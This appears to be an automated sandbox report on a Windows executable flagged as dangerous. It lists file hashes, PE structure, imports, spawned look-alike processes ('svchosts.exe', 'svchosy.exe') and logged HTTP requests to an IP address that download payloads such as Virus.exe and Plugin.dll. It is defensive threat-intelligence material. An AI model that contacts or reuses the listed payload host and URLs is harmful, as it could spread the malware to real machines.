Analysis task

Analysis type | VM tag | Start time | End time | Duration
File (Windows) | win7-sp1-x64-shaapp03-1 | 2020-11-30 12:51:18 | 2020-11-30 12:53:28 | 130 seconds

Maldun score

10.0

Dangerous

File details

File name 13131313.exe
File size 790528 bytes
File type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 1d25ea59f34de2654bdd0944ed923037
SHA1 49786a35bdcab73336dd0b06fd944a27957f9cba
SHA256 90ec36bfc87ae17dacd147138ead049256037df7ba62e6328db16538ffc684c8
SHA512 e6a4e2f5f722c1bebc5c00f1401988d6a3478e9ea5eff107744151c1475bb4f45102529a6b3aeb35e52b41dc91bd3ab1b2508ceb4513631131bf17f87bfd0440
CRC32 6BB767EB
Ssdeep 12288:uFyAi2fm2Nsed36Ugm7YUtvm/nmeAz7cE5ulX:uTu2Welxg4YSvCmeE7cEuh
Hosts contacted

No host records.

DNS resolution

Domain | Security rating | Response
acroipm.adobe.com CNAME acroipm.adobe.com.edgesuite.net
CNAME a1983.dscd.akamai.net
A 23.63.75.34
A 23.63.75.9

PE information

Image base 0x00400000
Entry point 0x0046564e
Declared checksum 0x00000000
Actual checksum 0x000ca899
Minimum required OS version 4.0
Compile time 2020-11-30 12:51:01
Import hash 6ce94e265482c54fdfe9a5a3dcee76c8
Icon exact hash 7e8d0dbe5de19f74f384ae459c5abecf
Icon similarity hash 439e81c5165936c3ea55d4df339c6380

Version information

LegalCopyright
FileVersion
Comments
ProductName
ProductVersion
FileDescription
Translation

PE sections

Name | Virtual address | Virtual size | Raw data size | Characteristics | Entropy
.text 0x00001000 0x00084762 0x00085000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.58
.rdata 0x00086000 0x00020ef4 0x00021000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.65
.data 0x000a7000 0x000360a8 0x00014000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.98
.rsrc 0x000de000 0x00005958 0x00006000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.82

Resources

Name | Offset | Size | Language | Sublanguage | Entropy | File type
TEXTINCLUDE 0x000dec20 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
TEXTINCLUDE 0x000dec20 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
TEXTINCLUDE 0x000dec20 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_MENU 0x000e17f0 0x00000284 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 4.28 data
RT_MENU 0x000e17f0 0x00000284 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 4.28 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_GROUP_CURSOR 0x000e34cc 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_CURSOR 0x000e34cc 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_CURSOR 0x000e34cc 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_ICON 0x000e3534 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_GROUP_ICON 0x000e3534 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_GROUP_ICON 0x000e3534 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_VERSION 0x000e3548 0x00000240 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.83 data
RT_MANIFEST 0x000e3788 0x000001cd LANG_NEUTRAL SUBLANG_NEUTRAL 5.08 XML 1.0 document, ASCII text, with very long lines, with no line terminators

Imports

Library: RASAPI32.dll:
0x486398 RasHangUpA
Library: KERNEL32.dll:
0x486174 lstrcmpiA
0x486178 SetEndOfFile
0x48617c UnlockFile
0x486180 LockFile
0x486184 FlushFileBuffers
0x486188 SetFilePointer
0x48618c DuplicateHandle
0x486190 lstrcpynA
0x486198 SetLastError
0x4861a4 GetCurrentProcess
0x4861ac GetSystemDirectoryA
0x4861b0 CreateSemaphoreA
0x4861b4 ResumeThread
0x4861b8 ReleaseSemaphore
0x4861c4 GetProfileStringA
0x4861c8 WriteFile
0x4861d0 IsBadCodePtr
0x4861d4 IsBadReadPtr
0x4861d8 CompareStringW
0x4861dc CompareStringA
0x4861e4 GetStringTypeW
0x4861e8 GetStringTypeA
0x4861f0 IsBadWritePtr
0x4861f4 VirtualAlloc
0x4861f8 LCMapStringW
0x4861fc LCMapStringA
0x486204 VirtualFree
0x486208 HeapCreate
0x48620c HeapDestroy
0x486214 GetStdHandle
0x486218 SetHandleCount
0x486230 GetFileType
0x486234 SetStdHandle
0x486238 GetACP
0x48623c HeapSize
0x486240 TerminateProcess
0x486244 GetLocalTime
0x486248 GetSystemTime
0x48624c RaiseException
0x486250 CreateFileA
0x486254 SetEvent
0x486258 FindResourceA
0x48625c LoadResource
0x486260 LockResource
0x486264 ReadFile
0x486268 GetModuleFileNameA
0x48626c WideCharToMultiByte
0x486270 MultiByteToWideChar
0x486274 GetCurrentThreadId
0x486278 ExitProcess
0x48627c GlobalSize
0x486280 GlobalFree
0x48628c lstrcatA
0x486290 lstrlenA
0x486294 WinExec
0x486298 lstrcpyA
0x48629c FindNextFileA
0x4862a0 GlobalReAlloc
0x4862a4 HeapFree
0x4862a8 HeapReAlloc
0x4862ac GetProcessHeap
0x4862b0 HeapAlloc
0x4862b4 GetFullPathNameA
0x4862b8 FreeLibrary
0x4862bc LoadLibraryA
0x4862c0 GetLastError
0x4862c4 GetVersionExA
0x4862cc CreateThread
0x4862d0 CreateEventA
0x4862d4 Sleep
0x4862d8 GlobalAlloc
0x4862dc GlobalLock
0x4862e0 GlobalUnlock
0x4862e4 GetTempPathA
0x4862e8 FindFirstFileA
0x4862ec FindClose
0x4862f0 GetFileAttributesA
0x4862f4 DeleteFileA
0x486300 GetModuleHandleA
0x486304 GetProcAddress
0x486308 RtlUnwind
0x48630c GetStartupInfoA
0x486310 GetOEMCP
0x486314 GetCPInfo
0x486318 GetProcessVersion
0x48631c SetErrorMode
0x486320 GlobalFlags
0x486324 GetCurrentThread
0x486328 GetFileTime
0x48632c GetFileSize
0x486330 TlsGetValue
0x486334 LocalReAlloc
0x486338 TlsSetValue
0x48633c TlsFree
0x486340 GlobalHandle
0x486344 TlsAlloc
0x486348 LocalAlloc
0x48634c lstrcmpA
0x486350 GetVersion
0x486354 MulDiv
0x486358 GetCommandLineA
0x48635c GetTickCount
0x486360 CreateProcessA
0x486364 WaitForSingleObject
0x486368 CloseHandle
0x48636c LocalFree
0x486374 GlobalGetAtomNameA
0x486378 GlobalAddAtomA
0x48637c GlobalFindAtomA
0x486380 GlobalDeleteAtom
Library: USER32.dll:
0x4863b4 GetCursorPos
0x4863b8 MessageBoxA
0x4863bc SetWindowPos
0x4863c0 SendMessageA
0x4863c4 DestroyCursor
0x4863c8 SetParent
0x4863cc IsWindow
0x4863d0 PostMessageA
0x4863d4 GetTopWindow
0x4863d8 GetParent
0x4863dc GetSystemMetrics
0x4863e0 GetFocus
0x4863e4 GetClientRect
0x4863e8 InvalidateRect
0x4863ec ValidateRect
0x4863f0 UpdateWindow
0x4863f4 EqualRect
0x4863f8 GetWindowRect
0x4863fc SetForegroundWindow
0x486400 DestroyMenu
0x486404 IsChild
0x486408 ReleaseDC
0x48640c IsRectEmpty
0x486410 FillRect
0x486414 GetDC
0x486418 SetCursor
0x48641c LoadCursorA
0x486420 SetActiveWindow
0x486424 GetSysColor
0x486428 SetWindowLongA
0x48642c GetWindowLongA
0x486430 RedrawWindow
0x486434 EnableWindow
0x486438 IsWindowVisible
0x48643c OffsetRect
0x486440 PtInRect
0x486444 DestroyIcon
0x486448 IntersectRect
0x48644c InflateRect
0x486450 SetRect
0x486454 SetScrollPos
0x486458 SetScrollRange
0x48645c GetScrollRange
0x486460 SetCapture
0x486464 GetCapture
0x486468 ReleaseCapture
0x48646c SetTimer
0x486470 KillTimer
0x486474 WinHelpA
0x486478 LoadBitmapA
0x48647c CopyRect
0x486484 ScreenToClient
0x486488 GetMessagePos
0x48648c SetWindowRgn
0x486494 GetWindow
0x486498 GetActiveWindow
0x48649c SetFocus
0x4864a0 IsIconic
0x4864a4 EmptyClipboard
0x4864a8 SetClipboardData
0x4864ac OpenClipboard
0x4864b0 GetClipboardData
0x4864b4 CloseClipboard
0x4864b8 wsprintfA
0x4864bc WaitForInputIdle
0x4864c0 SetCursorPos
0x4864c4 BeginPaint
0x4864c8 GetSysColorBrush
0x4864cc LoadStringA
0x4864d0 GetDesktopWindow
0x4864d4 GetClassNameA
0x4864dc GetMenuState
0x4864e0 SetMenuItemBitmaps
0x4864e4 CheckMenuItem
0x4864e8 MoveWindow
0x4864ec IsDialogMessageA
0x4864f0 ScrollWindowEx
0x4864f4 SendDlgItemMessageA
0x4864f8 MapWindowPoints
0x4864fc AdjustWindowRectEx
0x486500 SetWindowTextA
0x486504 GetForegroundWindow
0x486508 LoadIconA
0x48650c TranslateMessage
0x486510 DrawFrameControl
0x486514 DrawEdge
0x486518 DrawFocusRect
0x48651c WindowFromPoint
0x486520 GetMessageA
0x486524 DispatchMessageA
0x486528 SetRectEmpty
0x486538 DrawIconEx
0x48653c CreatePopupMenu
0x486540 AppendMenuA
0x486544 ModifyMenuA
0x486548 CreateMenu
0x486550 GetDlgCtrlID
0x486554 GetSubMenu
0x486558 EnableMenuItem
0x48655c ClientToScreen
0x486564 LoadImageA
0x48656c ShowWindow
0x486570 IsWindowEnabled
0x486578 GetKeyState
0x486580 PostQuitMessage
0x486584 IsZoomed
0x486588 GetClassInfoA
0x48658c DefWindowProcA
0x486590 GetSystemMenu
0x486594 DeleteMenu
0x486598 GetMenu
0x48659c SetMenu
0x4865a0 PeekMessageA
0x4865a4 GetWindowTextA
0x4865ac CharUpperA
0x4865b0 GetWindowDC
0x4865b4 UnregisterClassA
0x4865b8 EndPaint
0x4865bc TabbedTextOutA
0x4865c0 DrawTextA
0x4865c4 GrayStringA
0x4865c8 GetDlgItem
0x4865cc DestroyWindow
0x4865d4 EndDialog
0x4865d8 GetNextDlgTabItem
0x4865dc GetWindowPlacement
0x4865e4 GetLastActivePopup
0x4865e8 GetMessageTime
0x4865ec RemovePropA
0x4865f0 CallWindowProcA
0x4865f4 GetPropA
0x4865f8 UnhookWindowsHookEx
0x4865fc SetPropA
0x486600 GetClassLongA
0x486604 CallNextHookEx
0x486608 SetWindowsHookExA
0x48660c CreateWindowExA
0x486610 GetMenuItemID
0x486614 GetMenuItemCount
0x486618 RegisterClassA
0x48661c GetScrollPos
Library: GDI32.dll:
0x48602c CreatePalette
0x486030 StretchBlt
0x486034 SelectPalette
0x486038 RealizePalette
0x48603c GetDIBits
0x486040 GetWindowExtEx
0x486044 GetViewportOrgEx
0x486048 GetWindowOrgEx
0x48604c BeginPath
0x486050 EndPath
0x486054 PathToRegion
0x486058 CreateEllipticRgn
0x48605c CreateRoundRectRgn
0x486060 GetTextColor
0x486064 GetBkMode
0x486068 GetBkColor
0x48606c GetROP2
0x486070 GetStretchBltMode
0x486074 GetPolyFillMode
0x48607c CreateDCA
0x486080 CreateBitmap
0x486084 SelectObject
0x486088 GetObjectA
0x48608c CreatePen
0x486090 PatBlt
0x486094 CombineRgn
0x486098 CreateRectRgn
0x48609c FillRgn
0x4860a0 CreateSolidBrush
0x4860a4 GetStockObject
0x4860a8 CreateFontIndirectA
0x4860ac EndPage
0x4860b0 EndDoc
0x4860b4 DeleteDC
0x4860b8 CreateDIBitmap
0x4860bc StartPage
0x4860c0 BitBlt
0x4860c4 CreateCompatibleDC
0x4860c8 DeleteObject
0x4860cc Rectangle
0x4860d0 LPtoDP
0x4860d4 DPtoLP
0x4860d8 GetCurrentObject
0x4860dc RoundRect
0x4860e4 GetDeviceCaps
0x4860e8 SaveDC
0x4860ec RestoreDC
0x4860f0 SetBkMode
0x4860f4 SetPolyFillMode
0x4860f8 SetROP2
0x4860fc SetTextColor
0x486100 SetMapMode
0x486104 SetViewportOrgEx
0x486108 OffsetViewportOrgEx
0x48610c SetViewportExtEx
0x486110 ScaleViewportExtEx
0x486114 SetWindowOrgEx
0x486118 SetWindowExtEx
0x48611c ScaleWindowExtEx
0x486120 GetClipBox
0x486124 ExcludeClipRect
0x486128 MoveToEx
0x48612c LineTo
0x486130 SelectClipRgn
0x486134 CreatePolygonRgn
0x486138 GetClipRgn
0x48613c SetStretchBltMode
0x486144 SetBkColor
0x486148 ExtSelectClipRgn
0x48614c Ellipse
0x486150 StartDocA
0x486154 GetTextMetricsA
0x486158 Escape
0x48615c ExtTextOutA
0x486160 TextOutA
0x486164 RectVisible
0x486168 PtVisible
0x48616c GetViewportExtEx
Library: WINMM.dll:
0x486658 waveOutWrite
0x48665c waveOutPause
0x486660 waveOutReset
0x486664 waveOutClose
0x486668 waveOutGetNumDevs
0x48666c waveOutOpen
0x486674 midiStreamOpen
0x486678 midiStreamProperty
0x486680 midiStreamOut
0x486684 midiStreamStop
0x486688 midiOutReset
0x48668c midiStreamClose
0x486690 midiStreamRestart
Library: WINSPOOL.DRV:
0x486698 ClosePrinter
0x48669c OpenPrinterA
0x4866a0 DocumentPropertiesA
Library: ADVAPI32.dll:
0x486000 RegCreateKeyExA
0x486004 RegQueryValueA
0x486008 RegCreateKeyA
0x48600c RegSetValueExA
0x486010 RegOpenKeyExA
0x486014 RegCloseKey
Library: SHELL32.dll:
0x4863a4 ShellExecuteA
0x4863ac Shell_NotifyIconA
Library: ole32.dll:
0x4866f0 CLSIDFromString
0x4866f4 OleUninitialize
0x4866f8 OleInitialize
Library: OLEAUT32.dll:
0x486388 UnRegisterTypeLib
0x48638c RegisterTypeLib
0x486390 LoadTypeLib
Library: COMCTL32.dll:
0x48601c None
0x486020 ImageList_Destroy
Library: WS2_32.dll:
0x4866a8 closesocket
0x4866ac send
0x4866b0 select
0x4866b4 WSACleanup
0x4866b8 WSAStartup
0x4866bc WSAAsyncSelect
0x4866c0 inet_ntoa
0x4866c4 recvfrom
0x4866c8 ioctlsocket
0x4866cc recv
0x4866d0 getpeername
0x4866d4 accept
Library: WININET.dll:
0x486624 HttpQueryInfoA
0x486628 InternetOpenA
0x48662c InternetCloseHandle
0x486630 InternetSetOptionA
0x486634 InternetConnectA
0x486638 InternetReadFile
0x486640 HttpSendRequestA
0x486644 HttpOpenRequestA
0x486648 InternetCrackUrlA
Library: comdlg32.dll:
0x4866dc ChooseColorA
0x4866e0 GetSaveFileNameA
0x4866e4 GetOpenFileNameA
0x4866e8 GetFileTitleA

No antivirus engine scan information!

Process tree

13131313.exe, PID: 2312, parent PID: 2152
svchosts.exe, PID: 2492, parent PID: 2312
svchosy.exe, PID: 2660, parent PID: 2492
services.exe, PID: 432, parent PID: 344
mscorsvw.exe, PID: 2208, parent PID: 432
mscorsvw.exe, PID: 2020, parent PID: 432

TCP

Source address | Source port | Destination address | Destination port
192.168.122.201 49163 23.63.75.9 acroipm.adobe.com 80
192.168.122.201 49161 45.125.56.74 8081
192.168.122.201 49164 45.125.56.74 8081
192.168.122.201 49166 45.125.56.74 888

UDP

Source address | Source port | Destination address | Destination port
192.168.122.201 59401 192.168.122.1 53

HTTP requests

URI | HTTP data
URL: http://45.125.56.74:8081/Memory.sys
GET /Memory.sys HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache

URL: http://45.125.56.74:8081/Memory2.sys
GET /Memory2.sys HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache
Cookie: HFS_SID_=0.890553839271888

URL: http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip
GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache

URL: http://45.125.56.74:8081/Plugin.dll
GET /Plugin.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache

URL: http://45.125.56.74:8081/Virus.exe
GET /Virus.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache
Cookie: HFS_SID_=0.708140051923692

SMTP traffic

No SMTP traffic.

IRC traffic

No IRC requests.

ICMP traffic

No ICMP traffic.

CIF report

No CIF results

Network alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol SID Signature Category
2020-11-30 12:51:39.739854+0800 192.168.122.201 49161 45.125.56.74 8081 TCP 2016879 ET POLICY Unsupported/Fake Windows NT Version 5.0 Potential Corporate Privacy Violation
2020-11-30 12:51:40.706203+0800 192.168.122.201 49161 45.125.56.74 8081 TCP 2016879 ET POLICY Unsupported/Fake Windows NT Version 5.0 Potential Corporate Privacy Violation
2020-11-30 12:51:44.682320+0800 192.168.122.201 49164 45.125.56.74 8081 TCP 2016879 ET POLICY Unsupported/Fake Windows NT Version 5.0 Potential Corporate Privacy Violation

TLS

No TLS

Suricata HTTP

No Suricata HTTP

No files extracted from network traffic.
No files were dropped.
No similar analyses found.
Processing ( 17.048 seconds )

  • 12.054 Suricata
  • 1.202 BehaviorAnalysis
  • 1.182 NetworkAnalysis
  • 1.013 VirusTotal
  • 0.909 Static
  • 0.356 TargetInfo
  • 0.304 peid
  • 0.012 Strings
  • 0.01 AnalysisInfo
  • 0.004 Memory
  • 0.002 config_decoder

Signatures ( 2.134 seconds )

  • 1.566 md_url_bl
  • 0.076 api_spamming
  • 0.055 stealth_decoy_document
  • 0.055 stealth_timeout
  • 0.043 antiav_detectreg
  • 0.018 injection_createremotethread
  • 0.018 process_interest
  • 0.017 infostealer_ftp
  • 0.014 vawtrak_behavior
  • 0.014 kovter_behavior
  • 0.013 antiemu_wine_func
  • 0.012 infostealer_browser_password
  • 0.012 injection_runpe
  • 0.011 antivm_vbox_libs
  • 0.01 infostealer_im
  • 0.01 md_domain_bl
  • 0.009 mimics_filetime
  • 0.009 shifu_behavior
  • 0.008 reads_self
  • 0.008 virus
  • 0.008 process_needed
  • 0.008 antianalysis_detectreg
  • 0.007 stealth_file
  • 0.007 anomaly_persistence_autorun
  • 0.007 exec_crash
  • 0.007 antivm_generic_disk
  • 0.006 bootkit
  • 0.006 hancitor_behavior
  • 0.006 antiav_detectfile
  • 0.005 geodo_banking_trojan
  • 0.005 infostealer_bitcoin
  • 0.005 infostealer_mail
  • 0.005 network_http
  • 0.005 ransomware_files
  • 0.004 antiav_avast_libs
  • 0.004 betabot_behavior
  • 0.004 antisandbox_sunbelt_libs
  • 0.004 ransomware_extensions
  • 0.003 antivm_vmware_libs
  • 0.003 antisandbox_sboxie_libs
  • 0.003 antiav_bitdefender_libs
  • 0.003 antivm_generic_scsi
  • 0.002 tinba_behavior
  • 0.002 andromeda_behavior
  • 0.002 antivm_generic_services
  • 0.002 antisandbox_sleep
  • 0.002 kibex_behavior
  • 0.002 anormaly_invoke_kills
  • 0.002 antivm_parallels_keys
  • 0.002 antivm_vbox_files
  • 0.002 antivm_xen_keys
  • 0.002 disables_browser_warn
  • 0.002 darkcomet_regkeys
  • 0.002 network_torgateway
  • 0.001 rat_nanocore
  • 0.001 dridex_behavior
  • 0.001 Locky_behavior
  • 0.001 antivm_vmware_events
  • 0.001 cerber_behavior
  • 0.001 cryptowall_behavior
  • 0.001 antisandbox_productid
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_hyperv_keys
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_security
  • 0.001 modify_proxy
  • 0.001 maldun_malicious_drop_executable_file_to_temp_folder
  • 0.001 md_bad_drop
  • 0.001 network_cnc_http
  • 0.001 recon_fingerprint

Reporting ( 0.627 seconds )

  • 0.57 ReportHTMLSummary
  • 0.057 Malheur
Task ID 592619
Mongo ID 5fc47ae07e769a09e2a4d387
Cuckoo release 1.4-Maldun